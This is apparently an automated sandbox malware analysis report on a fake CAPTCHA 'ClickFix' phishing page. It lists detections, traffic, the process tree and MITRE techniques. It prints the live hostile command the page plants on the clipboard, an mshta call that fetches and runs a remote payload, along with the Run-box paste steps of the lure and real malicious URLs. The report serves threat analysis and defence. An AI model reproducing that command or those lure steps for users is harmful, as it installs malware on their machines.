Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
https://aistreamx.com/67db9a04702992c391d24ddb

Overview

General Information

Sample URL:https://aistreamx.com/67db9a04702992c391d24ddb
Analysis ID:1646888
Infos:

Detection

CAPTCHA Scam ClickFix
Score:76
Range:0 - 100
Confidence:100%

Signatures

Detect drive by download via clipboard copy & paste
Suricata IDS alerts for network traffic
Yara detected CAPTCHA Scam ClickFix
AI detected suspicious Javascript
HTML page adds supicious text to clipboard
Phishing site or detected (based on various text indicators)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected suspicious crossdomain redirect
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTML page contains hidden javascript code
May sleep (evasive loops) to hinder dynamic analysis
Searches for the Microsoft Outlook file path

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 6940 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 7132 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2052,i,16369264578013469847,8884588238301993752,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2128 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 5892 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://aistreamx.com/67db9a04702992c391d24ddb" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • mshta.exe (PID: 2072 cmdline: "C:\Windows\system32\mshta.exe" https://pub-69ca4621dc04444c93e08fedc7fdae4d.r2.dev/iiii.mp3 # # ? ?m ??t ? ??b?t: ????CHA Ver?f?c?t??? UID: 181902 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • cleanup

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
dropped/chromecache_55JoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security

    HTML

    SourceRuleDescriptionAuthorStrings
    0.0.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
      0.1.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security

        Sigma Signatures

        No Sigma rule has matched

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-03-24T11:54:14.114394+010028594861A Network Trojan was detected149.248.213.147443192.168.2.1649706TCP

        Joe Sandbox Signatures

        • Phishing
        • Compliance
        • Software Vulnerabilities
        • Networking
        • System Summary
        • Persistence and Installation Behavior
        • Malware Analysis System Evasion

        Click to jump to signature section

        Show All Signature Results

        Phishing

        barindex
        Source: Yara matchFile source: 0.0.pages.csv, type: HTML
        Source: Yara matchFile source: 0.1.pages.csv, type: HTML
        Source: Yara matchFile source: dropped/chromecache_55, type: DROPPED
        Source: 0.0..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://random-check.fly.storage.tigris.dev/pass-t... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script uses base64-encoded strings to conceal a URL that appears to be used for downloading a malicious audio file. Additionally, the script creates a hidden textarea element, copies the obfuscated content to the clipboard, and displays UI elements, which suggests potential phishing or social engineering attempts. While the script includes some decoy functions and junk variables, these do not mitigate the overall malicious nature of the code.
        Source: Chrome DOM: 0.0OCR Text: Verify You Are Human Please verify that you are a human to continue. I'm not a robot
        Source: Chrome DOM: 0.1OCR Text: Verify You Are Human Please veri that ou are a human to continue. Verification Steps 1. Press Windows Button 2. Press CTRL + V 3. Press Enter
        Source: https://random-check.fly.storage.tigris.dev/pass-this-security-check.html?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=tid_RybmvaL_VPmJmFgiNKurjXyuWNvFGfefZntnOVLTLtBupRlkVi%2F20250323%2Fauto%2Fs3%2Faws4_request&X-Amz-Date=20250323T095737Z&X-Amz-Expires=518400&X-Amz-SignedHeaders=host&X-Amz-Signature=a06915b9229b481cc5fe9e3c9d63289209b196ef3db05e2da16ce691e820affdHTTP Parser: Base64 decoded: https://pub-69ca4621dc04444c93e08fedc7fdae4d.r2.dev/iiii.mp3
        Source: https://random-check.fly.storage.tigris.dev/pass-this-security-check.html?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=tid_RybmvaL_VPmJmFgiNKurjXyuWNvFGfefZntnOVLTLtBupRlkVi%2F20250323%2Fauto%2Fs3%2Faws4_request&X-Amz-Date=20250323T095737Z&X-Amz-Expires=518400&X-Amz-SignedHeaders=host&X-Amz-Signature=a06915b9229b481cc5fe9e3c9d63289209b196ef3db05e2da16ce691e820affdHTTP Parser: No favicon
        Source: https://random-check.fly.storage.tigris.dev/pass-this-security-check.html?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=tid_RybmvaL_VPmJmFgiNKurjXyuWNvFGfefZntnOVLTLtBupRlkVi%2F20250323%2Fauto%2Fs3%2Faws4_request&X-Amz-Date=20250323T095737Z&X-Amz-Expires=518400&X-Amz-SignedHeaders=host&X-Amz-Signature=a06915b9229b481cc5fe9e3c9d63289209b196ef3db05e2da16ce691e820affdHTTP Parser: No favicon
        Source: unknownHTTPS traffic detected: 5.161.37.228:443 -> 192.168.2.16:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 5.161.37.228:443 -> 192.168.2.16:49705 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 149.248.213.147:443 -> 192.168.2.16:49706 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49711 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 149.248.213.147:443 -> 192.168.2.16:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49715 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.80.100:443 -> 192.168.2.16:49716 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.140.237:443 -> 192.168.2.16:49735 version: TLS 1.2
        Source: chrome.exeMemory has grown: Private usage: 12MB later: 39MB

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2859486 - Severity 1 - ETPRO MALWARE Observed ClickFix Powershell Delivery Page Inbound : 149.248.213.147:443 -> 192.168.2.16:49706
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: aistreamx.com to https://random-check.fly.storage.tigris.dev/pass-this-security-check.html?x-amz-algorithm=aws4-hmac-sha256&x-amz-credential=tid_rybmval_vpmjmfginkurjxyuwnvfgfefzntnovltltbuprlkvi%2f20250323%2fauto%2fs3%2faws4_request&x-amz-date=20250323t095737z&x-amz-expires=518400&x-amz-signedheaders=host&x-amz-signature=a06915b9229b481cc5fe9e3c9d63289209b196ef3db05e2da16ce691e820affd
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownTCP traffic detected without corresponding DNS query: 142.250.65.195
        Source: unknownTCP traffic detected without corresponding DNS query: 142.250.65.195
        Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
        Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.152.20
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.152.20
        Source: global trafficHTTP traffic detected: GET /67db9a04702992c391d24ddb HTTP/1.1Host: aistreamx.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /pass-this-security-check.html?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=tid_RybmvaL_VPmJmFgiNKurjXyuWNvFGfefZntnOVLTLtBupRlkVi%2F20250323%2Fauto%2Fs3%2Faws4_request&X-Amz-Date=20250323T095737Z&X-Amz-Expires=518400&X-Amz-SignedHeaders=host&X-Amz-Signature=a06915b9229b481cc5fe9e3c9d63289209b196ef3db05e2da16ce691e820affd HTTP/1.1Host: random-check.fly.storage.tigris.devConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://random-check.fly.storage.tigris.dev/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: random-check.fly.storage.tigris.devConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://random-check.fly.storage.tigris.dev/pass-this-security-check.html?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=tid_RybmvaL_VPmJmFgiNKurjXyuWNvFGfefZntnOVLTLtBupRlkVi%2F20250323%2Fauto%2Fs3%2Faws4_request&X-Amz-Date=20250323T095737Z&X-Amz-Expires=518400&X-Amz-SignedHeaders=host&X-Amz-Signature=a06915b9229b481cc5fe9e3c9d63289209b196ef3db05e2da16ce691e820affdAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.0.0-beta3/webfonts/fa-brands-400.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveOrigin: https://random-check.fly.storage.tigris.devsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.cssAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /iiii.mp3 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pub-69ca4621dc04444c93e08fedc7fdae4d.r2.devConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: aistreamx.com
        Source: global trafficDNS traffic detected: DNS query: random-check.fly.storage.tigris.dev
        Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: pub-69ca4621dc04444c93e08fedc7fdae4d.r2.dev
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 262Content-Type: application/xmlServer: Tigris OSServer-Timing: total;dur=1483,cache;desc=miss;dur=0.903000, server;desc=miss;dur=1465Strict-Transport-Security: max-age=63072000; includeSubDomains; preloadX-Amz-Request-Id: 1742813655337569305Date: Mon, 24 Mar 2025 10:54:16 GMTConnection: close
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
        Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownHTTPS traffic detected: 5.161.37.228:443 -> 192.168.2.16:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 5.161.37.228:443 -> 192.168.2.16:49705 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 149.248.213.147:443 -> 192.168.2.16:49706 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49711 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 149.248.213.147:443 -> 192.168.2.16:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49715 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.80.100:443 -> 192.168.2.16:49716 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.140.237:443 -> 192.168.2.16:49735 version: TLS 1.2
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6940_1479628776
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6940_1479628776
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
        Source: classification engineClassification label: mal76.phis.win@23/6@9/156
        Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\33CUD2J1\iiii[1].mp3
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2052,i,16369264578013469847,8884588238301993752,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2128 /prefetch:3
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://aistreamx.com/67db9a04702992c391d24ddb"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2052,i,16369264578013469847,8884588238301993752,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2128 /prefetch:3
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: unknownProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://pub-69ca4621dc04444c93e08fedc7fdae4d.r2.dev/iiii.mp3 # # ? ?m ??t ? ??b?t: ????CHA Ver?f?c?t??? UID: 181902
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
        Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
        Source: Window RecorderWindow detected: More than 3 window changes detected

        Persistence and Installation Behavior

        barindex
        Source: Chrome DOM: 0.1OCR Text: Verify You Are Human Please veri that ou are a human to continue. Verification Steps 1. Press Windows Button 2. Press CTRL + V 3. Press Enter
        Source: screenshotOCR Text: e about:blank x X reCAPTCHV3 demo ra nd om-check.fly.sto rage.tig ris.dev/pass-this-secu rity-check.htm l?X-Amz-Al g orithm =AWS4- H MAC-S H A256&X-Am z-Credentia I PmJ m F. .. Verify You Are Human Please veri that ou are a human to continue. Verification Steps 1. Press Windows Button 2. Press CTRL + V 3. Press Enter ENG p Type here to search SG 24/03/2025
        Source: screenshotOCR Text: about:blank X reCAPTCHV3 demo rand om-check.fly.storage.tigris.dev/pass-this-security-check.html?X-Amz-Algorithm PmJm F. Verify You Are Human Please veri that ou are a human to continue. Verification Steps 1. Press Windows Button 2. Press CTRL + V Past 3. Press Enter x Run Type the name of a program, folder, document or Internet resource, and Windows will open It for you. # I orn not robot: CAPTCHA Verification IJID: 18190 Open: ENG p Type here to search SG 24/03/2025
        Source: screenshotOCR Text: about:blank X reCAPTCHV3 demo rand om-check.fly.storage.tigris.dev/pass-this-security-check.html?X-Amz-Algorithm PmJm F. Verify You Are Human Please veri that ou are a human to continue. Verification Steps 1. Press Windows Button 2. Press CTRL + V 3. Press Enter x Run Type the name of a program, folder, document or Internet resource, and Windows will open It for you. Open: ENG p Type here to search SG 24/03/2025
        Source: screenshotOCR Text: e about:blank X reCAPTCHV3 demo rand om-check.fly.storage.tigris.dev/pass-this-security-check.html?X-Amz-Algorithm PmJm F. Verify You Are Human Please veri that ou are a human to continue. Verification Steps 1. Press Windows Button 2. Press CTRL + V 3. Press Enter ENG p Type here to search SG 24/03/2025
        Source: screenshotOCR Text: e about:blank X reCAPTCHV3 demo ra nd om-check.fly.sto rage.tig ris.dev/pass-this-secu rity-check.htm l?X-Amz-Al g orithm =AWS4- H MAC-S H A256&X-Am z-Credentia I PmJ m F. .. Verify You Are Human Please veri that ou are a human to continue. Verification Steps 1. Press Windows Button 2. Press CTRL + V 3. Press Enter ENG p Type here to search SG 24/03/2025
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeClipboard modification: mshta https://pub-69ca4621dc04444c93e08fedc7fdae4d.r2.dev/iiii.mp3 # # m t bt: CHA VerfctUID:181902
        Source: C:\Windows\System32\mshta.exeWindow / User API: threadDelayed 741
        Source: C:\Windows\System32\mshta.exeWindow / User API: threadDelayed 2154
        Source: C:\Windows\System32\mshta.exe TID: 2008Thread sleep count: 34 > 30
        Source: C:\Windows\System32\mshta.exe TID: 2008Thread sleep count: 741 > 30
        Source: C:\Windows\System32\mshta.exe TID: 2008Thread sleep count: 2154 > 30

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation3
        Browser Extensions        		1
        Process Injection        		11
        Masquerading        		OS Credential Dumping1
        Virtualization/Sandbox Evasion        		Remote Services1
        Email Collection        		1
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        DLL Side-Loading        		1
        DLL Side-Loading        		1
        Virtualization/Sandbox Evasion        		LSASS Memory1
        Application Window Discovery        		Remote Desktop ProtocolData from Removable Media3
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        Extra Window Memory Injection        		1
        Process Injection        		Security Account Manager2
        System Information Discovery        		SMB/Windows Admin SharesData from Network Shared Drive3
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        DLL Side-Loading        		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture4
